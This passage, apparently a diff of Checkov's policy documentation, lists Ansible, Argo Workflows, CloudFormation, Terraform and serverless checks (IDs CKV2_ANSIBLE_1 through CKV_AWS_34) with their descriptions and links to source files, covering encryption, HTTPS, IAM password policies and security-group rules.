-|  139 | CKV2_ANSIBLE_1           | resource                         | tasks.ansible.builtin.uri                                                                        | Ensure that HTTPS url is used with uri                                                                                                                                                                   | Ansible                 | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml)                                                                                             |
-|  140 | CKV2_ANSIBLE_1           | resource                         | tasks.uri                                                                                        | Ensure that HTTPS url is used with uri                                                                                                                                                                   | Ansible                 | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml)                                                                                             |
-|  141 | CKV2_ANSIBLE_2           | resource                         | tasks.ansible.builtin.get_url                                                                    | Ensure that HTTPS url is used with get_url                                                                                                                                                               | Ansible                 | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml)                                                                                       |
-|  142 | CKV2_ANSIBLE_2           | resource                         | tasks.get_url                                                                                    | Ensure that HTTPS url is used with get_url                                                                                                                                                               | Ansible                 | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml)                                                                                       |
-|  143 | CKV2_ANSIBLE_3           | resource                         | block                                                                                            | Ensure block is handling task errors properly                                                                                                                                                            | Ansible                 | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml)                                                                                 |
-|  144 | CKV2_ANSIBLE_4           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that packages with untrusted or missing GPG signatures are not used by dnf                                                                                                                        | Ansible                 | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml)                                                                                 |
-|  145 | CKV2_ANSIBLE_4           | resource                         | tasks.dnf                                                                                        | Ensure that packages with untrusted or missing GPG signatures are not used by dnf                                                                                                                        | Ansible                 | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml)                                                                                 |
-|  146 | CKV2_ANSIBLE_5           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that SSL validation isn't disabled with dnf                                                                                                                                                       | Ansible                 | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml)                                                                                             |
-|  147 | CKV2_ANSIBLE_5           | resource                         | tasks.dnf                                                                                        | Ensure that SSL validation isn't disabled with dnf                                                                                                                                                       | Ansible                 | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml)                                                                                             |
-|  148 | CKV2_ANSIBLE_6           | resource                         | tasks.ansible.builtin.dnf                                                                        | Ensure that certificate validation isn't disabled with dnf                                                                                                                                               | Ansible                 | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml)                                                                                     |
-|  149 | CKV2_ANSIBLE_6           | resource                         | tasks.dnf                                                                                        | Ensure that certificate validation isn't disabled with dnf                                                                                                                                               | Ansible                 | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml)                                                                                     |
-|  150 | CKV_ARGO_1               | argo_workflows                   | spec                                                                                             | Ensure Workflow pods are not using the default ServiceAccount                                                                                                                                            | Argo Workflows          | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py)                                                                            |
-|  151 | CKV_ARGO_2               | argo_workflows                   | spec                                                                                             | Ensure Workflow pods are running as non-root user                                                                                                                                                        | Argo Workflows          | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py)                                                                                              |
-|  152 | CKV_AWS_1                | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | Terraform               | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py)                                                                                     |
-|  153 | CKV_AWS_1                | resource                         | serverless_aws                                                                                   | Ensure IAM policies that allow full "*-*" administrative privileges are not created                                                                                                                      | serverless              | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py)                                                                                |
-|  154 | CKV_AWS_2                | resource                         | AWS::ElasticLoadBalancingV2::Listener                                                            | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Cloudformation          | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py)                                                                                  |
-|  155 | CKV_AWS_2                | resource                         | aws_alb_listener                                                                                 | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform               | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                       |
-|  156 | CKV_AWS_2                | resource                         | aws_lb_listener                                                                                  | Ensure ALB protocol is HTTPS                                                                                                                                                                             | Terraform               | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py)                                                                                       |
-|  157 | CKV_AWS_3                | resource                         | AWS::EC2::Volume                                                                                 | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Cloudformation          | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py)                                                                                        |
-|  158 | CKV_AWS_3                | resource                         | aws_ebs_volume                                                                                   | Ensure all data stored in the EBS is securely encrypted                                                                                                                                                  | Terraform               | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py)                                                                                             |
-|  159 | CKV_AWS_5                | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Cloudformation          | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py)                                                                    |
-|  160 | CKV_AWS_5                | resource                         | aws_elasticsearch_domain                                                                         | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform               | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                         |
-|  161 | CKV_AWS_5                | resource                         | aws_opensearch_domain                                                                            | Ensure all data stored in the Elasticsearch is securely encrypted at rest                                                                                                                                | Terraform               | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py)                                                                         |
-|  162 | CKV_AWS_6                | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Cloudformation          | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                |
-|  163 | CKV_AWS_6                | resource                         | aws_elasticsearch_domain                                                                         | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform               | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                     |
-|  164 | CKV_AWS_6                | resource                         | aws_opensearch_domain                                                                            | Ensure all Elasticsearch has node-to-node encryption enabled                                                                                                                                             | Terraform               | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py)                                                     |
-|  165 | CKV_AWS_7                | resource                         | AWS::KMS::Key                                                                                    | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Cloudformation          | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py)                                                                                            |
-|  166 | CKV_AWS_7                | resource                         | aws_kms_key                                                                                      | Ensure rotation for customer created CMKs is enabled                                                                                                                                                     | Terraform               | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py)                                                                                                 |
-|  167 | CKV_AWS_8                | resource                         | AWS::AutoScaling::LaunchConfiguration                                                            | Ensure all data stored in the Launch configuration EBS is securely encrypted                                                                                                                             | Cloudformation          | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                  |
-|  168 | CKV_AWS_8                | resource                         | aws_instance                                                                                     | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform               | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                       |
-|  169 | CKV_AWS_8                | resource                         | aws_launch_configuration                                                                         | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted                                                                                                | Terraform               | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py)                                                       |
-|  170 | CKV_AWS_9                | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform               | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py)                                                                       |
-|  171 | CKV_AWS_10               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform               | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py)                                                                               |
-|  172 | CKV_AWS_11               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform               | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py)                                                             |
-|  173 | CKV_AWS_12               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one number                                                                                                                                                  | Terraform               | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py)                                                                               |
-|  174 | CKV_AWS_13               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy prevents password reuse                                                                                                                                                       | Terraform               | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py)                                                                                 |
-|  175 | CKV_AWS_14               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one symbol                                                                                                                                                  | Terraform               | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py)                                                                               |
-|  176 | CKV_AWS_15               | resource                         | aws_iam_account_password_policy                                                                  | Ensure IAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform               | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py)                                                             |
-|  177 | CKV_AWS_16               | resource                         | AWS::RDS::DBInstance                                                                             | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Cloudformation          | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py)                                                                                        |
-|  178 | CKV_AWS_16               | resource                         | aws_db_instance                                                                                  | Ensure all data stored in the RDS is securely encrypted at rest                                                                                                                                          | Terraform               | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py)                                                                                             |
-|  179 | CKV_AWS_17               | resource                         | AWS::RDS::DBInstance                                                                             | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Cloudformation          | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py)                                                                        |
-|  180 | CKV_AWS_17               | resource                         | aws_db_instance                                                                                  | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform               | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                             |
-|  181 | CKV_AWS_17               | resource                         | aws_rds_cluster_instance                                                                         | Ensure all data stored in RDS is not publicly accessible                                                                                                                                                 | Terraform               | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py)                                                                             |
-|  182 | CKV_AWS_18               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Cloudformation          | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py)                                                                                          |
-|  183 | CKV_AWS_18               | resource                         | aws_s3_bucket                                                                                    | Ensure the S3 bucket has access logging enabled                                                                                                                                                          | Terraform               | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml)                                                                                 |
-|  184 | CKV_AWS_19               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has server-side-encryption enabled                                                                                                                                                  | Cloudformation          | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py)                                                                                          |
-|  185 | CKV_AWS_19               | resource                         | aws_s3_bucket                                                                                    | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform               | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                           |
-|  186 | CKV_AWS_19               | resource                         | aws_s3_bucket_server_side_encryption_configuration                                               | Ensure all data stored in the S3 bucket is securely encrypted at rest                                                                                                                                    | Terraform               | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml)                                                                           |
-|  187 | CKV_AWS_20               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket does not allow READ permissions to everyone                                                                                                                                         | Cloudformation          | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py)                                                                                    |
-|  188 | CKV_AWS_20               | resource                         | aws_s3_bucket                                                                                    | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform               | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                 |
-|  189 | CKV_AWS_20               | resource                         | aws_s3_bucket_acl                                                                                | S3 Bucket has an ACL defined which allows public READ access.                                                                                                                                            | Terraform               | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml)                                                                                 |
-|  190 | CKV_AWS_21               | resource                         | AWS::S3::Bucket                                                                                  | Ensure the S3 bucket has versioning enabled                                                                                                                                                              | Cloudformation          | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py)                                                                                          |
-|  191 | CKV_AWS_21               | resource                         | aws_s3_bucket                                                                                    | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform               | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                           |
-|  192 | CKV_AWS_21               | resource                         | aws_s3_bucket_versioning                                                                         | Ensure all data stored in the S3 bucket have versioning enabled                                                                                                                                          | Terraform               | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml)                                                                           |
-|  193 | CKV_AWS_22               | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker Notebook is encrypted at rest using KMS CMK                                                                                                                                             | Terraform               | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py)                                                                 |
-|  194 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                          |
-|  195 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroupEgress                                                                    | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                          |
-|  196 | CKV_AWS_23               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure every security groups rule has a description                                                                                                                                                      | Cloudformation          | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py)                                                          |
-|  197 | CKV_AWS_23               | resource                         | aws_db_security_group                                                                            | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  198 | CKV_AWS_23               | resource                         | aws_elasticache_security_group                                                                   | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  199 | CKV_AWS_23               | resource                         | aws_redshift_security_group                                                                      | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  200 | CKV_AWS_23               | resource                         | aws_security_group                                                                               | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  201 | CKV_AWS_23               | resource                         | aws_security_group_rule                                                                          | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  202 | CKV_AWS_23               | resource                         | aws_vpc_security_group_egress_rule                                                               | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  203 | CKV_AWS_23               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure every security groups rule has a description                                                                                                                                                      | Terraform               | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py)                                                               |
-|  204 | CKV_AWS_24               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                              |
-|  205 | CKV_AWS_24               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                              |
-|  206 | CKV_AWS_24               | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|  207 | CKV_AWS_24               | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|  208 | CKV_AWS_24               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py)                                                   |
-|  209 | CKV_AWS_25               | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Cloudformation          | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                          |
-|  210 | CKV_AWS_25               | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Cloudformation          | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                          |
-|  211 | CKV_AWS_25               | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|  212 | CKV_AWS_25               | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|  213 | CKV_AWS_25               | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py)                                               |
-|  214 | CKV_AWS_26               | resource                         | AWS::SNS::Topic                                                                                  | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Cloudformation          | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py)                                                                              |
-|  215 | CKV_AWS_26               | resource                         | aws_sns_topic                                                                                    | Ensure all data stored in the SNS topic is encrypted                                                                                                                                                     | Terraform               | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py)                                                                                   |
-|  216 | CKV_AWS_27               | resource                         | AWS::SQS::Queue                                                                                  | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Cloudformation          | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py)                                                                              |
-|  217 | CKV_AWS_27               | resource                         | aws_sqs_queue                                                                                    | Ensure all data stored in the SQS queue is encrypted                                                                                                                                                     | Terraform               | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py)                                                                                   |
-|  218 | CKV_AWS_28               | resource                         | AWS::DynamoDB::Table                                                                             | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Cloudformation          | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py)                                                                                  |
-|  219 | CKV_AWS_28               | resource                         | aws_dynamodb_table                                                                               | Ensure DynamoDB point in time recovery (backup) is enabled                                                                                                                                               | Terraform               | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py)                                                                                       |
-|  220 | CKV_AWS_29               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                            |
-|  221 | CKV_AWS_29               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest                                                                                                                | Terraform               | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py)                                 |
-|  222 | CKV_AWS_30               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                      |
-|  223 | CKV_AWS_30               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit                                                                                                             | Terraform               | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py)                           |
-|  224 | CKV_AWS_31               | resource                         | AWS::ElastiCache::ReplicationGroup                                                               | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Cloudformation          | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)    |
-|  225 | CKV_AWS_31               | resource                         | aws_elasticache_replication_group                                                                | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token                                                                                          | Terraform               | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py)         |
-|  226 | CKV_AWS_32               | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR policy is not set to public                                                                                                                                                                   | Cloudformation          | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py)                                                                                                |
-|  227 | CKV_AWS_32               | resource                         | aws_ecr_repository_policy                                                                        | Ensure ECR policy is not set to public                                                                                                                                                                   | Terraform               | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py)                                                                                                     |
-|  228 | CKV_AWS_33               | resource                         | AWS::KMS::Key                                                                                    | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Cloudformation          | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py)                                                                    |
-|  229 | CKV_AWS_33               | resource                         | aws_kms_key                                                                                      | Ensure KMS key policy does not contain wildcard (*) principal                                                                                                                                            | Terraform               | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py)                                                                         |
-|  230 | CKV_AWS_34               | resource                         | AWS::CloudFront::Distribution                                                                    | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Cloudformation          | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                  |
-|  231 | CKV_AWS_34               | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS                                                                                                                                      | Terraform               | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py)                                                       |
